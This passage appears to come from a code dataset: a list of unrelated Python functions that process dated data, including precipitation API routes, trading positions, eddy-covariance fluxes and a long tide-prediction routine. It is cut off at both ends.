cover, id = line.split('\\t')\n date, time = calcTime.getNiceTimeLabel(timestamp).split(\" \")\n # add values to actual Dict\n timestep = calcTime.getTimeInSecs(simDate + time)\n procFcdDict[pqDateDict[date]].setdefault(\n timestep, []).append((id, edge, float(speed) / 3.6))\n inputFile.close()\n\n return procFcdDict", "def getBlpData(date, mode='production'):\n\tgetBlpDataFile = lambda date, mode: \\\n\t\tjoin(getInputDirectory(mode), 'BlpData_' + date + '.xlsx')\n\n\n\treturn \\\n\tcompose(\n\t\tdict\n\t , partial(map, lambda p: (p['ID'], p))\n\t , getRawPositionsFromFile\n\t , getBlpDataFile\n\t)(date, mode)", "def get_cdf_data(self):\n df = self.df_events.copy()\n df['event_time'] = df['event_time'].apply(self.parse_time_stamp) # convert strings to datetime objects\n # only get the rows with event_type_reason == \"user_pick_up\" and event_time between 6 am and 10 pm\n # also make sure dates are between the start and end period\n df = df[(df['event_type_reason'] == \"user_pick_up\") & (df['event_time'] >= iso8601.parse_date(self.start)) & (df['event_time'] <= iso8601.parse_date(self.end))]\n df['date'] = df['event_time'].apply(self.get_date).astype(str) # get date part of datetime object\n df['minute'] = df['event_time'].apply(self.get_minutes).astype(float)\n # consider only trips that began with operating hours\n df = df[(df['minute'] >= (6*60)) & (df['minute'] < (22*60))]\n return df[['date', 'minute']].reset_index(drop=True)", "def interpolate_ephemeris(self):\n #Compute the offsets into the lookup tables\n startemiss, stopemiss = self.get_emissivity_offsets()\n hourslice, starttime = self.get_hour_offsets()\n latslice = self.get_lat_offsets()\n \n #Compute the start and stop dates\n startdata = self.extract_season(self.startseason,startemiss,\n hourslice, latslice)\n stopdata = self.extract_season(self.stopseason,startemiss,\n hourslice, latslice)\n 
# Interpolate Season\n seasons = [self.startseason, self.stopseason]\n season_f = compute_interpolation_function(seasons, [startdata, stopdata], 'linear')\n data = season_f(self.season)\n #Interpolate time\n self.data = self.interpolatehour(hourslice, starttime, data)", "def ec_data_processor_precip(path, x='TIMESTAMP_END', y='LE', daily=True):\n\n\n # Get the data from the path and turn the path into a data frame\n # ec_dataset = pd.read_csv(path, header=2)\n\n ec_dataset = pd.read_csv(path, header=2, engine='python')\n\n # print ec_dataset.head()\n print ec_dataset['LE'].head()\n print ec_dataset[ec_dataset[y] != -9999].head()\n # === get rid of no data values in any category of the energy balance ===\n precip_dataset = ec_dataset[ec_dataset['P'] != -9999]\n ec_dataset = ec_dataset[ec_dataset[y] != -9999]\n ec_dataset = ec_dataset[ec_dataset['NETRAD'] != -9999]\n ec_dataset = ec_dataset[ec_dataset['H'] != -9999]\n ec_dataset = ec_dataset[ec_dataset['LE'] != -9999]\n # # You probably won't need these because Marcy Doesn't think they are valid for her towers\n # ec_dataset = ec_dataset[ec_dataset['SH'] != -9999]\n # ec_dataset = ec_dataset[ec_dataset['SLE'] != -9999]\n\n if x.startswith(\"TIMESTAMP\"):\n a = ec_dataset[x].apply(lambda b: dt.strptime(str(b), '%Y%m%d%H%M'))\n aa = precip_dataset[x].apply(lambda d: dt.strptime(str(d), '%Y%m%d%H%M'))\n\n # # TODO - if converting PRISM to MTN time.\n # # Convert to PRISM time (Mtn Standard + 5 hours) PRISM midnight is 12:00 UTC - 7 hours for mountain. Net +5 hrs\n # a = [i + timedelta(hours=19) for i in a]\n # aa = [i + timedelta(hours=19) for i in aa]\n\n\n else:\n a = ec_dataset[x]\n\n # ===== Time Series Processing =====\n\n timeseries = a\n p_timeseries = aa\n # print 'timeseries\\n', timeseries\n Rn = ec_dataset['NETRAD'].values\n H = ec_dataset['H'].values\n LE = ec_dataset['LE'].values\n P = precip_dataset['P']\n print 'P \\n', P\n # indexed_datetimes = pd.DataFrame(pd.DatetimeIndex(timeseries))\n\n # # testing\n # plt.plot(timeseries, P, color='black')\n # plt.show()\n\n # recreate a dataframe of the variables you want to time average on a monthly timestep\n halfhour_data = pd.DataFrame({'timeseries': timeseries, 'Rn': Rn, 'LE': LE, 'H': H}) # took out precip. no good vals? 'P': P\n\n halfhour_precip = pd.DataFrame({'timeseries': p_timeseries, 'P': P})\n # set the timeseries column to the index so groupby function can group by year and month of the index.\n halfhour_data = halfhour_data.set_index(pd.DatetimeIndex(halfhour_data['timeseries']))\n halfhour_precip = halfhour_precip.set_index(pd.DatetimeIndex(halfhour_precip['timeseries']))\n # convert latent heat to mmH2O by dividing by latent heat of vaporization.\n halfhour_data['mmh20'] = halfhour_data['LE'] * 7.962e-4\n\n if daily:\n\n daily_cum_data = halfhour_data.groupby([lambda x: x.year, lambda x: x.month, lambda x: x.day]).sum()\n daily_cum_precip = halfhour_precip.groupby([lambda x: x.year, lambda x: x.month, lambda x: x.day]).sum()\n\n # get each day in the timeseries. 
there are duplicates from the groupby function, so use set() to get rid of\n # duplicates\n daily_cum_time = daily_time_parse(timeseries)\n daily_cum_precip_time = daily_time_parse(p_timeseries)\n\n # # testing\n # daily_cum_data.to_csv('/Users/dcadol/Desktop/daily_cumulative_df.csv')\n\n # format daily_cum_data to have datetimes\n daily_cum_data['date'] = daily_cum_time\n daily_cum_precip['date'] = daily_cum_precip_time\n\n return daily_cum_data, daily_cum_precip", "def precipitation():\n # * Convert the query results to a Dictionary using `date` as the key and `prcp` as the value.\n session = Session(engine)\n results = session.query(Measurement.date, Measurement.prcp).all()\n session.close()\n all_precips = []\n for date, prcp in results:\n precip_dict = {}\n precip_dict[\"date\"] = date\n precip_dict[\"prcp\"] = prcp\n all_precips.append(precip_dict)\n\n # * Return the JSON representation of your dictionary.\n return jsonify(all_precips)", "def GetIscEventcatalog(start_date_time, days, pos, catalog_type):\n # Read the isc data. Note that we take any data points within 1000 km, which\n # is a huge distance. We let the polygon distance calculation below pull it\n # in closer.\n data = isc.ReadISCData('gs://clouddfe-cfs/isc', catalog_type, start_date_time,\n days, pos, 1000)\n\n # Munge the data. Brendan's calculations have different field names from\n # what's returned from the ISC reader. Likely we want to remove this step.\n # TODO(jfaller, meadeb): Make field names consistent.\n ret = {}\n ret['yr'] = [x['date_time'].year for x in data]\n ret['mon'] = [x['date_time'].month for x in data]\n ret['day'] = [x['date_time'].day for x in data]\n ret['hr'] = [x['date_time'].hour for x in data]\n ret['min'] = [x['date_time'].minute for x in data]\n ret['sec'] = [x['date_time'].second for x in data]\n ret['latitude'] = [x['lat'] for x in data]\n ret['longitude'] = [x['lon'] for x in data]\n ret['depth'] = [x['depth'] for x in data]\n ret['magnitude'] = [x['magnitude'] for x in data]\n ret['datetime'] = [x['date_time'] for x in data]\n\n return ret", "def getAllPositions(date, mode='production'):\n\treturn \\\n\tchain(\n\t\tgetGenevaPositions('19437', date, mode)\n\t , filterfalse( lambda p: getBlpPortfolioId(p).startswith('19437')\n\t \t\t\t , getAllPositionsBlp(date, mode)\n\t \t\t\t )\n\t)", "def readClimatePointEntries(context):\n return GenericMetadata._readEntriesForSection(context.projectDir, GenericMetadata.CLIMATE_POINT_SECTION)", "def getHourlyPrecip(self, keyword):\n\t\tweather_data = self.getHourlyWeatherFromCSV(keyword, \"f\", \"precipitation\")\n\t\tprecip_values = [] # Array that will contain all the precipitation data\n\t\tprecip_data = {} # Dictionary of precipitation data\n\n\t\t# Getting precipiation data\n\t\tfor data in weather_data:\n\t\t\tprecip_data[\"x\"] = self.helper.getDateInEpoch(data[\"date\"])\n\t\t\tprecip_data[\"y\"] = float(data[\"precipitation\"][:-1])/100\n\t\t\tprecip_values.append(precip_data)\n\t\t\tprecip_data = {}\n\n\t\treturn precip_values", "def gettrack_codar(jdmat_m,lon_vel,lat_vel,u,v,startdate,numdays,daystep,la,lo):\n # calculate the points near la,la\n distance,index_location=nearxy(lon_vel,lat_vel,lo,la)\n \n ####### get index of startdate in jdmat_m#####\n jdmat_m_num=[] # this is the date in the form of a number\n jdmat_m_list,jdmat=[],[]\n # convert array to list\n for jdmat_m_i in jdmat_m:\n jdmat_m_list.append(jdmat_m_i)\n for i in jdmat_m_list: # convert time to number\n jdmat_m_num.append(i)\n 
dts=date2num(datetime.datetime(2001,1,1,0,0,0))\n jdmat_m=[i+dts for i in jdmat_m]\n index_startdate=int(round(np.interp(startdate,jdmat_m,range(len(jdmat_m)))))#get the index of startdate\n # get u,v\n u1=float(u[index_startdate][index_location])\n v1=float(v[index_startdate][index_location])\n if u1==-999.0/100:# case of no good data\n u1=0\n v1=0\n nsteps=scipy.floor(min(numdays,jdmat_m_num[-1])/daystep)\n # get the velocity data at this first time & place\n lat_k='lat'+str(1)\n lon_k='lon'+str(1)\n uu,vv,lon_k,lat_k,time=[],[],[],[],[]\n uu.append(u1)\n vv.append(v1)\n lat_k.append(la)\n lon_k.append(lo)\n time.append(startdate)\n \n for i in range(1,int(nsteps)):\n # first, estimate the particle move to its new position using velocity of previous time steps\n lat1=lat_k[i-1]+float(vv[i-1]*daystep*24*3600)/1000/1.8535/60\n lon1=lon_k[i-1]+float(uu[i-1]*daystep*24*3600)/1000/1.8535/60*(scipy.cos(float(lat_k[i-1]))/180*np.pi)\n # find the closest model time for the new timestep\n jdmat_m_num_i=time[i-1]+daystep\n time.append(jdmat_m_num_i)\n #print jdmat_m_num_i\n\n index_startdate=int(round(np.interp(jdmat_m_num_i,jdmat_m_num,range(len(jdmat_m_num)))))\n #find the point's index of near lat1,lon1\n index_location=nearxy(lon_vel,lat_vel,lon1,lat1)[1]\n ui=u[index_startdate][index_location]\n vi=v[index_startdate][index_location]\n #if u1<>-999.0/100:# case of good data\n vv.append(vi)\n uu.append(ui)\n # estimate the particle move from its new position using velocity of previous time steps\n lat_k.append(float(lat1+lat_k[i-1]+float(vv[i]*daystep*24*3600)/1000/1.8535/60)/2)\n lon_k.append(float(lon1+lon_k[i-1]+float(uu[i]*daystep*24*3600)/1000/1.8535/60*scipy.cos(float(lat_k[i])/180*np.pi))/2)\n #else:\n # vv.append(0)\n # uu.append(0)\n # estimate the particle move from its new position using velocity of previous time steps\n # lat_k.append(float(lat1))\n # lon_k.append(float(lon1)) \n return lat_k,lon_k,time", "def _get_positions(self):\n pos_url = self.pos_url % (self.date, self.instrument, self.exchange)\n self.positions = pd.read_csv(pos_url, parse_dates=[0],\n date_parser=lambda t: pd.to_datetime(str(t), format='%Y%m%dT%H%M%S'))\n self.positions.fillna(np.nan)\n self.positions.index = pd.to_datetime(self.positions.time, unit='s')\n self.positions.columns = ['time', 'bid', 'bid_depth', 'bid_depth_total', 'ask', 'ask_depth', 'ask_depth_total']\n self.positions = self.positions[self.exchange_pre:self.exchange_post]", "def precipitation():\n # Create our session (link) from Python to the DB.\n session = Session(engine)\n\n # Calculate the date 1 year ago from the last data point in the database.\n last_measurement_data_point_tuple = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n (latest_date, ) = last_measurement_data_point_tuple\n latest_date = dt.datetime.strptime(latest_date, '%Y-%m-%d')\n latest_date = latest_date.date()\n date_year_ago = latest_date - relativedelta(years=1)\n\n # Perform a query to retrieve the data and precipitation scores.\n data_from_last_year = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= date_year_ago).all()\n\n session.close()\n\n # Convert the query results to a dictionary using date as the key and prcp as the value.\n all_precipication = []\n for date, prcp in data_from_last_year:\n if prcp != None:\n precip_dict = {}\n precip_dict[date] = prcp\n all_precipication.append(precip_dict)\n\n # Return the JSON representation of dictionary.\n return jsonify(all_precipication)", "def precipitation():\n\n 
# Open sessions\n    session = Session(bind=engine)\n\n    # Find out what is the latest date with data\n    lastDate=session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n    for date in lastDate:\n        dataArray = date.split(\"-\")\n        (year,month,day) = dataArray\n    \n    # Calculate the date 1 year ago from the latest date\n    year_ago = dt.date(int(year),int(month),int(day)) - dt.timedelta(days=365)\n\n    # Define the variables for start and end date\n    latestPrcpDate=f'{year}-{month}-{day}'\n    oldestPrcpDate=year_ago.isoformat()\n\n    # Initiating an empty dictionary\n    precipitation={}\n\n    # Query DB for precipitation values from start date to end date\n    results=session.query(Measurement).filter(Measurement.date >= year_ago).all()\n    for row in results:\n        prcp={row.date:row.prcp} #storing the date and the measured value in a dictionary\n        precipitation.update(prcp) #updating the main dictionary with the previous smaller dictionary\n\n    # Calculating the main API dictionary with an info key, a date interval and the results/observations \n    precipitationAPI={'info':'Last 12 months of precipitation data in inches',\n                    'date interval':{'from':oldestPrcpDate,'to':latestPrcpDate},\n                    'results':precipitation\n                    }\n\n    # Returning the main dictionary in a JSON format API response \n    return jsonify(precipitationAPI)", "def _get_data(self):\n\n        data = self.get_data()\n\n        required_data = ['open','close','open_date','high','low']\n        if not np.isin(required_data, data.columns).all():\n            raise ImplementationError(f'''\n            Data must contain columns: {required_data}\n            ''')\n\n        data = data.sort_values('open_date')\n        data.index = data.open_date\n\n        temp_dates = pd.unique(data.open_date)\n        self.total_candles = len(temp_dates)\n        self.start_date, self.end_date = min(temp_dates), max(temp_dates)\n\n        # Divide df based on symbol, create DataEngine object, add to dict.\n        data_dict = {}\n        for symbol in self.symbols.symbol:\n            try:\n                data_dict[symbol] = DataEngine(data[data.symbol == symbol])\n            except DiscontinuousError as err:\n                print(f'There are missing dates in data for {symbol}')\n                raise err\n            except ValueError as err:\n                print(f'No data provided for symbol: {symbol}')\n                self.symbols = self.symbols.drop(symbol)\n\n        return data_dict", "def _calc_ecdf(self):\n        for numerator, vals in self.lift.items():\n            for denominator, lift in vals.items():\n                raw_data = np.array(lift)\n                cdfx = np.sort(np.unique(lift))\n                x_values = np.linspace(start=min(cdfx),\n                                       stop=max(cdfx),\n                                       num=len(cdfx))\n                size_data = raw_data.size\n                y_values = []\n                for i in x_values:\n                    temp = raw_data[raw_data <= i]\n                    value = temp.size / size_data\n                    y_values.append(value)\n                temp = {}\n                temp['x'] = x_values\n                temp['y'] = y_values\n                if numerator not in self.ecdf.keys():\n                    self.ecdf[numerator] = {}\n                    self.ecdf[numerator][denominator] = temp\n                else:\n                    self.ecdf[numerator][denominator] = temp", "def precip():\n    date_prcp=session.query(measurements.date,measurements.prcp).all()\n    date_prcp_df=pd.DataFrame(date_prcp).set_index('date')\n    date_prcp_dict=date_prcp_df.to_dict()\n    return jsonify(date_prcp_dict)", "def construct_all_positions(self):\n        # Creates a dictionary for each symbol, sets a value of 0 for each, adds a datetime key, adds it to a list.\n        d = dict((k,v) for k,v in [(s,0) for s in self.symbol_list]) # self.current_positions\n        d['datetime'] = self.start_date\n        \n        return [d]", "def construct_all_positions(self):\n        # Creates a dictionary for each symbol, sets a value of 0 for each, adds a datetime key, adds it to a list.\n        d = dict((k,v) for k,v in [(s,0) for s in 
self.symbol_list]) # self.current_positions\n        d['datetime'] = self.start_date\n        \n        return [d]", "def load_covid_cases_data(date=None):\n    if not date:\n        date = datetime.today()\n    data = requests.get(f'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports/{date.strftime(\"%m-%d-%Y\")}.csv')\n\n    f = StringIO(data.text)\n    reader = csv.DictReader(f, delimiter=',')\n    results = {}\n    for row in reader:\n        fips = row.pop('FIPS', None)\n        if fips:\n            results[int(fips)] = row\n    print(f\"{date.strftime('%m-%d-%Y')} has {len(results.keys())} results\")\n    return results", "def precip():\n    # Query Measurement data\n    session = Session(engine)\n    results = session.query(Measurement.date, Measurement.prcp).all()\n\n    # Create a dictionary from the row data and append to a list of precipitation data\n    precip_data = []\n    for date, prcp in results:\n        precip_dict = {}\n        precip_dict[\"date\"] = date\n        precip_dict[\"Precipitation\"] = prcp\n        precip_data.append(precip_dict)\n\n    return jsonify(precip_data)", "def precipitation():\n    # Query all prcp\n    results = session.query(Measurement.date, Measurement.prcp).\\\n        filter(Measurement.date >= '2016-10-01').\\\n        group_by(Measurement.date).all()\n\n    all_precipitation = []\n\n    # Query for the dates and precipitation observations from the last year.\n    for result in results:\n        precipitation_dict = {}\n        precipitation_dict[\"date\"] = result[0]\n        precipitation_dict[\"prcp\"] = result[1]\n        all_precipitation.append(precipitation_dict)\n    \n    return jsonify(all_precipitation)", "def pacMare(date, estac):\n    monthList = [\"JAN\", \"FEV\", \"MAR\", \"ABR\", \"MAI\", \"JUN\", \"JUL\",\n                 \"AGO\", \"SET\", \"OUT\", \"NOV\", \"DEZ\"]\n    an = date.year\n    Mesl = date.month\n    strmes = monthList[Mesl-1]\n    di = date.day\n    data1 = \"%s/%s/%s\" %(di, Mesl, an)\n\n    DT = 1\n    HI = -3\n    d0 = 1\n\n    estacoes = Estacao()\n    constantes = Constantes()\n    cadastro = Cadastro()\n    combinacoes = Combinacoes()\n\n    f = estacoes.data['name'].index(estac)\n    Cod = estacoes.data['ID'][f]\n    LA1 = estacoes.data['latG'][f]\n    LA2 = estacoes.data['latM'][f]\n    LO1 = estacoes.data['lonG'][f]\n    LO2 = estacoes.data['lonM'][f]\n    nc = estacoes.data['ncomp'][f]\n    NM = estacoes.data['nm'][f]\n    fu = estacoes.data['fuso'][f]\n    ca = estacoes.data['carta'][f]\n    hemlat = estacoes.data['hemlat'][f]\n    hemlon = estacoes.data['hemlon'][f]\n    \n    infoList = []\n    lat = base10Tobase60(lat=base60Tobase10(LA1, LA2, hemlat))\n    lon = base10Tobase60(lon=base60Tobase10(LO1, LO2, hemlon))\n    latSTR = u\"Lat: %s\" % lat\n    lonSTR = u\"Lon: %s\" % lon\n    ncSTR = u\"Componentes: %s\" %(nc)\n    nmSTR = u\"Nível Médio: %s cm\" %(int(NM))\n    fuSTR = u\"Fuso: - %sh\" %(int(fu))\n    caSTR = u\"Número Carta: %s\" %(ca)\n\n    infoList.append(latSTR)\n    infoList.append(lonSTR)\n    infoList.append(ncSTR)\n    infoList.append(nmSTR)\n    infoList.append(fuSTR)\n    infoList.append(caSTR)\n\n    f = constantes.data['ID'].index(Cod)\n    ai = constantes.data['const'][ f:f+nc ]\n    h = constantes.data['amp'][ f:f+nc ]\n    G = constantes.data['phase'][ f:f+nc ]\n    HH = h[:]\n    GG = G[:]\n\n    MK, constID = [],[]\n    for k in range(nc):\n        f = cadastro.data['const'].index(ai[k])\n        MK.append(cadastro.data['M'][f])\n        constID.append(cadastro.data['cod'][f])\n    MK = str2int(MK)\n    constID = str2int(constID)\n\n    BB, CC = [],[]\n    for k in range(nc):\n        f = combinacoes.data['ID'].index(constID[k])\n        aux = combinacoes.data['subs'][ f: f+MK[k] ]\n        aux = str2float(aux)\n        BB.append(aux)\n        aux = combinacoes.data['comb'][ f: f+MK[k] ]\n        aux = str2float(aux)\n        
CC.append(aux)\n\n cdat = open(web2pyPath + \"modules/data/Vdata.txt\")\n V = []\n for line in cdat.readlines():\n line2 = line.strip('\\r\\n').split(',')\n line2 = str2float(line2)\n V.append(line2)\n\n D = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n n = 30\n\n # calculo dos elementos astronomicos\n MB = float(an % 4)\n MC = float(an % 100)\n MD = float(an % 400)\n dd = float(di)\n\n if MB == 0 and MC != 0 or MD == 0:\n D[2] = 29\n\n i1 = float(an / 100)\n i2 = i1 - 19\n if i2 != 0:\n t1 = i2\n j1 = abs(i2)\n c3 = j1 / i2\n t2 = t1 * t1 * c3\n c1 = int(j1 * 0.75 + 0.5) * c3\n else:\n t1 = 0.\n t2 = 0.\n c1 = 0.\n\n s0 = 277.0224 + 307.8831 * t1 - 0.0011 * t2 - 13.1764 * c1\n h0 = 280.1895 + 0.7689 * t1 + 0.0003 * t2 - 0.9856 * c1\n p0 = 334.3853 + 109.034 * t1 - 0.0103 * t2 - 0.1114 * c1\n nl = 100.7902 + 134.142 * t1 - 0.0021 * t2 - 0.053 * c1\n P1 = 281.2208 + 1.7192 * t1 + 0.00045 * t2 - 0.000047 * c1\n\n for i in range(Mesl):\n di = float(di + D[i])\n\n # bug de 2001\n if an <= 2000:\n di = di - 1 \n\n IA = i1 * 100\n BI = an - IA\n\n AI = int((BI - 1) * 0.25); AI = float(AI)\n if MD == 0: AI = AI + 1\n AD = AI + di\n N2 = n * DT * 0.5\n AV = N2\n SN = AV / 10000\n b = [None]\n b.append( s0 + 129.38481 * BI + 13.1764 * AD )\n b.append( h0 - 0.23872 * BI + 0.98565 * AD )\n b.append( p0 + 40.66249 * BI + 0.1114 * AD )\n b.append(None)\n b.append( nl + 19.32818 * BI + 0.05295 * AD )\n b.append( P1 + 0.01718 * BI + 0.000047 * AD )\n b[0] = b[2] - b[1]\n b[4] = 90.\n b.append( b[3] + N2 * 0.00464183 )\n b.append( b[5] + N2 * 0.00220641 )\n b.append( b[6] + N2 * 0.00000196 )\n\n a = [ [0.,1.,0.], [0.,2.,0.], [0.,3.,0.], [0.,0.,2.], [0.,1.,2.], [1.,0.,-1.], \n [2.,-1.,-1.], [2.,-1.,0.], [2.,-1.,1.], [2.,0.,0.], [2.,1.,0.], \n [2.,2.,0.], [2.,3.,0.] 
]\n\n b[0] = b[0] + HI * 14.49205211\n b[1] = b[1] + HI * 0.54902653\n b[2] = b[2] + HI * 0.0410686\n b[3] = b[3] + HI * 0.00464183\n b[5] = b[5] + HI * 0.00220641\n b[6] = b[6] + HI * 0.00000196\n\n z, Q = [], []\n for i in range(13):\n s = 0.\n for J in range(3):\n s = s + a[i][J] * b[J + 7]\n \n XX = s * 0.017453\n z.append(np.cos(XX))\n Q.append(np.sin(XX))\n\n W = []\n for i in range(37):\n WQ = 0.\n for J in range(5):\n WQ = WQ + V[i][J] * b[J]\n \n if i == 13 or i == 30:\n W.append( WQ + b[9] )\n elif i == 17 or i == 32:\n W.append( WQ - b[9] )\n else:\n W.append(WQ)\n\n F, U = [], []\n for k in range(38):\n F.append(None) # apenas para facilitar a copia do codigo em VB\n U.append(None) # depois, ambos serao popped-up\n z.insert(0, None) # idem\n Q.insert(0, None) # idem\n\n F[1] = 1\n F[2] = 1\n F[3] = 1 - 0.0307 * z[1] + 0.0007 * z[2] - 0.0534 * z[10] - 0.0218 * z[11] - 0.0059 * z[12]\n F[4] = 1 + 0.4142 * z[1] + 0.0377 * z[2] - 0.0008 * z[3] - 0.0028 * z[8] + 0.0431 * z[10] - 0.0023 * z[11]\n F[5] = 1 + 0.4141 * z[1] + 0.0384 * z[2] - 0.003 * z[7] - 0.003 * z[9] + 0.0179 * z[10] - 0.004 * z[12] - 0.0017 * z[13]\n F[6] = 1 + 0.1885 * z[1] - 0.0063 * z[2] - 0.0063 * z[12]\n F[7] = 1 + 0.1884 * z[1] - 0.0061 * z[2] - 0.0087 * z[10]\n F[8] = 1 + 0.1884 * z[1] - 0.0057 * z[2] + 0.0007 * z[6] - 0.0028 * z[10] - 0.0039 * z[12] - 0.0007 * z[13]\n F[9] = 1 + 0.1881 * z[1] - 0.0058 * z[2] - 0.0576 * z[10] + 0.0175 * z[11]\n F[10] = 1 + 0.1885 * z[1] - 0.0058 * z[2] + 0.0001 * z[8] - 0.0054 * z[10] - 0.001 * z[11]\n F[11] = 1 - 0.2454 * z[1] - 0.0142 * z[2] + 0.0445 * z[10]\n F[12] = 1 + 0.1714 * z[1] - 0.0054 * z[2] + 0.3596 * z[10] + 0.0664 * z[11] - 0.0057 * z[12]\n F[13] = 1 + 0.1905 * z[1]\n F[14] = 1 - 0.0078 * z[1]\n F[15] = 1 - 0.0112 * z[1] + 0.0007 * z[2] - 0.0004 * z[4] - 0.0015 * z[10] - 0.0003 * z[11]\n F[16] = 1\n F[17] = 1 + 0.1158 * z[1] - 0.0029 * z[2] + 0.0001 * z[11]\n F[18] = 1 + 0.019 * z[1]\n F[19] = 1 - 0.0384 * z[1] - 0.0185 * z[2] + 0.0132 * z[4] + 0.0105 * z[8] + 0.0344 * z[10]\n F[20] = 1 + 0.1676 * z[1] + 0.03 * z[11]\n F[21] = 1 + 0.1685 * z[1] - 0.0047 * z[2] - 0.0152 * z[10] - 0.0098 * z[11] - 0.0057 * z[12]\n F[22] = 1 + 0.6398 * z[1] + 0.1342 * z[2] + 0.008500001 * z[3] + 0.0296 * z[8] + 0.1496 * z[10] - 0.0037 * z[11]\n F[23] = 1 - 0.0337 * z[1]\n F[24] = 1 - 0.0374 * z[1] - 0.061 * z[12]\n F[25] = 1 - 0.0375 * z[1]\n F[26] = 1 - 0.0373 * z[1] + 0.0004 * z[2] + 0.0007 * z[6] - 0.0039 * z[12]\n F[27] = 1 - 0.0373 * z[1] + 0.0042 * z[10] - 0.0036 * z[11]\n F[28] = 1 - 0.0373 * z[1] + 0.0004 * z[2] + 0.0005 * z[10] - 0.0001 * z[11]\n F[29] = 1 - 0.0448 * z[1]\n F[30] = 1 - 0.0367 * z[1] + 0.0047 * z[8] - 0.2505 * z[10] - 0.1102 * z[11] - 0.0156 * z[12]\n F[31] = 1\n F[32] = 1 - 0.0022 * z[1]\n F[33] = 1 - 0.2535 * z[4] + 0.0141 * z[5]\n F[34] = 1 + 0.2852 * z[1] + 0.0324 * z[2]\n F[35] = 1 + 0.4389 * z[1] + 0.0487 * z[2] + 0.0487 * z[10] + 0.065 * z[11]\n F[36] = 1 + 0.4168 * z[1] + 0.0466 * z[2] - 0.078 * z[10]\n F[37] = 1 - 0.0564 * z[1]\n\n U[1] = 0\n U[2] = 0\n U[3] = 0.0007 * Q[1] - 0.0008 * Q[2] - 0.0534 * Q[10] - 0.0218 * Q[11] - 0.0059 * Q[12]\n U[4] = 0.4142 * Q[1] + 0.0377 * Q[2] - 0.0008 * Q[3] + 0.0027 * Q[8] - 0.0432 * Q[10] + 0.0022 * Q[11]\n U[5] = 0.4142 * Q[1] + 0.0384 * Q[2] + 0.003 * Q[7] + 0.003 * Q[9] - 0.018 * Q[10] - 0.004 * Q[12] - 0.0017 * Q[13]\n U[6] = -0.1885 * Q[1] + 0.0062 * Q[2] + 0.0062 * Q[12]\n U[7] = -0.1884 * Q[1] + 0.006 * Q[2] - 0.0087 * Q[10]\n U[8] = -0.1884 * Q[1] + 0.0057 * Q[2] - 0.0008 * Q[6] - 0.0028 * Q[10] + 
0.0039 * Q[12] + 0.0007 * Q[13]\n U[9] = -0.1882 * Q[1] + 0.0057 * Q[2] - 0.0576 * Q[10] + 0.0175 * Q[11]\n U[10] = -0.1885 * Q[1] + 0.0057 * Q[2] + 0.0001 * Q[8] - 0.0064 * Q[10] - 0.001 * Q[11]\n U[11] = -0.1886 * Q[1] - 0.0142 * Q[2] - 0.0446 * Q[10]\n U[12] = -0.2294 * Q[1] - 0.3596 * Q[10] - 0.0665 * Q[11] + 0.0057 * Q[12]\n U[13] = 0.246 * Q[1]\n U[14] = 0.0077 * Q[1]\n U[15] = 0.0111 * Q[1] - 0.0008 * Q[2] - 0.0004 * Q[4] - 0.0015 * Q[10] - 0.0003 * Q[11]\n U[16] = 0\n U[17] = 0.1554 * Q[1] - 0.003 * Q[2] - 0.0002 * Q[11]\n U[18] = 0.019 * Q[1]\n U[19] = -0.0384 * Q[1] - 0.0185 * Q[2] - 0.0132 * Q[4] - 0.0106 * Q[8] - 0.0344 * Q[10]\n U[20] = 0.231 * Q[1] - 0.03 * Q[11]\n U[21] = 0.2274 * Q[1] - 0.0047 * Q[2] - 0.0152 * Q[10] - 0.0098 * Q[11] - 0.0057 * Q[12]\n U[22] = 0.6398 * Q[1] + 0.1342 * Q[2] - 0.0296 * Q[8] - 0.1497 * Q[10] + 0.0037 * Q[11]\n U[23] = 0.0373 * Q[1]\n U[24] = 0.0373 * Q[1] + 0.006 * Q[12]\n U[25] = 0.0373 * Q[1] - 0.0005 * Q[2] - 0.0008 * Q[6] + 0.0039 * Q[12]\n U[26] = 0.0373 * Q[1] - 0.0005 * Q[2] - 0.0008 * Q[6] + 0.0039 * Q[12]\n U[27] = 0.0373 * Q[1] + 0.0042 * Q[10] + 0.0036 * Q[11]\n U[28] = 0.0373 * Q[1] - 0.0005 * Q[2] + 0.0005 * Q[9] + 0.0001 * Q[11]\n U[29] = 0.0487 * Q[1]\n U[30] = 0.0366 * Q[1] + 0.0047 * Q[8] - 0.2505 * Q[9] - 0.1102 * Q[11]\n U[31] = 0\n U[32] = -0.0022 * Q[1]\n U[33] = -0.2535 * Q[4] + 0.0141 * Q[5]\n U[34] = 0.3108 * Q[1] + 0.0324 * Q[2]\n U[35] = 0.4389 * Q[1] + 0.0487 * Q[2] - 0.0488 * Q[9] - 0.065 * Q[11]\n U[36] = 0.4542 * Q[1] + 0.0466 * Q[2] - 0.0078 * Q[10]\n U[37] = 0.0563 * Q[1]\n\n z.pop(0)\n Q.pop(0)\n F.pop(0)\n U.pop(0)\n AV = n * DT * 0.5\n\n for i in range(37):\n XX = F[i]\n YY = U[i]\n F[i] = np.sqrt( XX ** 2 + YY ** 2 )\n U[i] = W[i] + np.arctan(YY / XX) * 57.29578\n U[i] = U[i] - int(U[i] / 360) * 360\n if U[i] < 0: U[i] = U[i] + 360\n\n\n # calculo das alturas\n HC, GC = [],[]\n for k in range(110):\n HC.append(0)\n GC.append(0)\n\n for i in range(nc):\n s = 0.\n WQ = 0.\n T = 1.\n\n for J in range(MK[i]):\n jj = int(BB[i][J])\n kk = CC[i][J]\n T = T * F[jj-1] ** abs(kk)\n s = s + U[jj-1] * kk\n WQ = WQ + V[jj-1][5] * kk\n ZQ = s\n \n h[i] = T * h[i]\n s = s - G[i]\n if s < 0: s = s + 360.\n G[i] = s\n try: \n W[i] = WQ * DT\n except IndexError:\n W.append( WQ * DT )\n HC[i] = T * HC[i]\n ZQ = ZQ - GC[i]\n if ZQ < 0: ZQ = ZQ + 360.\n GC[i] = ZQ\n\n x, Y2, y = [],[],[]\n MM = 0\n for i in range(n):\n s = 0.\n ZQ = 0.\n\n for j in range(nc):\n AA = G[j] * 0.017453\n s = s + h[j] * np.cos(AA)\n G[j] = G[j] + W[j]\n AC = GC[j] * 0.017453\n ZQ = ZQ + HC[j] * np.cos(AC)\n GC[j] = GC[j] + W[j]\n\n x.append(s + NM)\n Y2.append(x[i])\n y.append(ZQ + 